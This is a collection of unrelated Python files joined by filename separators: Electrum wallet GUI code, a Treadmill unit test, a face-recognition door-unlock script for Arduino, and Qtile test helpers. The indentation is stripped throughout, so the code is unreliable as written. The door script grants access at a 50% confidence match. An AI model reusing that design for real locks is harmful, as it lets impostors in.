Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
vipfile_test.py
|
"""Unit test for vipfile.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import threading
import unittest
# Disable W0611: Unused import
import tests.treadmill_test_skip_windows # pylint: disable=W0611
import six
from treadmill import vipfile
class VipFileTest(unittest.TestCase):
"""Tests for teadmill.rulefile."""
def setUp(self):
self.root = tempfile.mkdtemp()
self.vips_dir = os.path.join(self.root, 'vips')
owner_dirs = os.path.join(self.root, 'owners')
os.mkdir(owner_dirs)
for owner in six.moves.range(0, 15):
with io.open(os.path.join(owner_dirs, str(owner)), 'w'):
pass
self.vips = vipfile.VipMgr(self.vips_dir, owner_dirs)
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
def test_alloc(self):
"""Verifies that vips are allocated atomically with no duplicates."""
vips = set()
def alloc_thread(idx):
"""Allocate container ip."""
ip0 = self.vips.alloc(str(idx))
vips.add(ip0)
threads = []
for i in range(0, 15):
threads.append(threading.Thread(target=alloc_thread, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(len(threads), len(vips))
def test_free(self):
"""Tests freeing the resource."""
owner = '3'
ip0 = self.vips.alloc(owner)
self.assertTrue(os.path.exists(os.path.join(self.vips_dir, ip0)))
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
# Calling free twice is noop.
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
if __name__ == '__main__':
unittest.main()
|
face_recognition.py
|
#
# Face Recognition authorisation
# An OpenCV based Local Binary Pattern Histogram (LBPH) face Recognition
# authorisation system with arduino support for door locks.
#
# created by Rajas Chavadekar on 03.08.2020, Pune, India
# github.com/rvcgeeks linkedin.com/in/rvchavadekar
#
import cv2, os
from sys import argv
face_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if argv[1] == 'g':
try:
int(argv[2])
except:
print('face_id must be integer!')
quit(1)
os.mkdir('dataset/' + argv[2])
vid_cam = cv2.VideoCapture(0)
count = 0
while(True):
_ , image_frame = vid_cam.read()
gray = cv2.cvtColor(image_frame, cv2.COLOR_BGR2GRAY)
faces = face_detector.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(image_frame, (x, y), (x + w, y + h), (255,0,0), 2)
cv2.imwrite('dataset/' + argv[2] + '/' + str(count) + '.jpg', gray[y : y + h, x : x + w])
cv2.imshow('frame', image_frame)
count += 1
if cv2.waitKey(100) & 0xFF == ord('q') or count > 200:
break
vid_cam.release()
cv2.destroyAllWindows()
elif argv[1] == 't':
import numpy as np
from PIL import Image
recognizer = cv2.face.LBPHFaceRecognizer_create()
face_imgs, ids = [], []
for face_id in os.listdir('dataset'):
for sample in os.listdir('dataset/' + face_id):
path = 'dataset/' + face_id + '/' + sample
print('processing : ' + path)
PIL_img = Image.open(path).convert('L')
numpy_img = np.array(PIL_img,'uint8')
faces = face_detector.detectMultiScale(numpy_img)
for (x, y, w, h) in faces:
face_imgs.append(numpy_img[y : y + h, x : x + w])
ids.append(int(face_id))
recognizer.train(face_imgs, np.array(ids))
recognizer.save('model.yml')
elif argv[1] == 'r':
board = None
try:
from pyfirmata import Arduino
if os.name == 'nt':
board = Arduino('COM3')
else:
board = Arduino('/dev/ttyACM0') # goto arduino ide -> examples -> Firmata -> StandardFirmata and burn it into board before
except Exception as e:
print(str(e) + '\nBOARD NOT WORKING')
board_is_active = 0
def board_start():
global board_is_active
if board:
# DO ARDUINO ACTIONS AFTER STARTING BOARD HERE
board.digital[12].write(1)
board.digital[13].write(0)
board_is_active = 0
def board_stop():
global board_is_active
if board:
# DO ARDUINO ACTIONS BEFORE STOPPING BOARD HERE
board.digital[12].write(0)
board.digital[13].write(0)
board_is_active = 0
from time import sleep
def board_if_success():
global board_is_active
if board:
# DO ARDUINO ACTIONS IF VERIFIED HERE
board.digital[12].write(0)
board.digital[13].write(1)
sleep(2)
board.digital[12].write(1)
board.digital[13].write(0)
board_is_active = 0
from threading import Thread
def launch_board_action(action):
global board_is_active
if board_is_active == 0:
board_is_active = 1
t = Thread(target = action)
t.daemon = True
t.start()
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read('model.yml')
font = cv2.FONT_HERSHEY_SIMPLEX
vid_cam = cv2.VideoCapture(0)
FACE_CONFD_THRESHOLD = 50 # percent
board_start()
while True:
ret, im = vid_cam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_detector.detectMultiScale(gray, 1.2, 5)
for (x, y, w, h) in faces:
face_id, distrust = recognizer.predict(gray[y : y + h, x : x + w])
confidence = 100 - distrust
caption = '%s -> %s' % (face_id, round(confidence, 2))
if confidence >= FACE_CONFD_THRESHOLD:
launch_board_action(board_if_success)
rect_col = (0, 255, 0)
else:
rect_col = (0, 0, 255)
cv2.rectangle(im, (x - 20, y - 20), (x + w + 20, y + h + 20), rect_col, 4)
cv2.rectangle(im, (x - 22, y - 90), (x + w + 22, y - 22), rect_col, -1)
cv2.putText(im, caption, (x, y - 40), font, 1, (255, 255, 255), 3)
cv2.imshow('im', im)
if cv2.waitKey(10) & 0xFF == ord('q'):
break
vid_cam.release()
cv2.destroyAllWindows()
board_stop()
|
helpers.py
|
"""
This file contains various helpers and basic variables for the test suite.
Defining them here rather than in conftest.py avoids issues with circular imports
between test/conftest.py and test/backend/<backend>/conftest.py files.
"""
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from libqtile import command, config, ipc, layout
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log, logger
from libqtile.resources import default_config
# the sizes for outputs
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
class Retry:
def __init__(
self,
fail_msg="retry failed!",
ignore_exceptions=(),
dt=sleep_time,
tmax=max_sleep,
return_on_fail=False,
):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
class BareConfig(Config):
auto_fullscreen = True
groups = [config.Group("a"), config.Group("b"), config.Group("c"), config.Group("d")]
layouts = [layout.stack.Stack(num_stacks=1), layout.stack.Stack(num_stacks=2)]
floating_layout = default_config.floating_layout
keys = [
config.Key(
["control"],
"k",
lazy.layout.up(),
),
config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [config.Screen()]
follow_mouse_focus = False
reconfigure_screens = False
class Backend(metaclass=ABCMeta):
"""A base class to help set up backends passed to TestManager"""
def __init__(self, env, args=()):
self.env = env
self.args = args
def create(self):
"""This is used to instantiate the Core"""
return self.core(*self.args)
def configure(self, manager):
"""This is used to do any post-startup configuration with the manager"""
pass
@abstractmethod
def fake_click(self, x, y):
"""Click at the specified coordinates"""
pass
@abstractmethod
def get_all_windows(self):
"""Get a list of all windows in ascending order of Z position"""
pass
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == "OK":
return True
return False
class TestManager:
"""Spawn a Qtile instance
Setup a Qtile server instance on the given display, with the given socket
and log files. The Qtile server must be started, and then stopped when it
is done. Windows can be spawned for the Qtile instance to interact with
with various `.test_*` methods.
"""
def __init__(self, backend, debug_log):
self.backend = backend
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.backend.manager = self
self.proc = None
self.c = None
self.testwindows = []
def __enter__(self):
"""Set up resources"""
self._sockfile = tempfile.NamedTemporaryFile()
self.sockfile = self._sockfile.name
return self
def __exit__(self, _exc_type, _exc_value, _exc_tb):
"""Clean up resources"""
self.terminate()
self._sockfile.close()
def start(self, config_class, no_spawn=False, state=None):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
os.environ.pop("DISPLAY", None)
os.environ.pop("WAYLAND_DISPLAY", None)
kore = self.backend.create()
os.environ.update(self.backend.env)
init_log(self.log_level)
if hasattr(self, "log_queue"):
logger.addHandler(logging.handlers.QueueHandler(self.log_queue))
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
state=state,
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
self.backend.configure(self)
return
if rpipe.poll(0.1):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
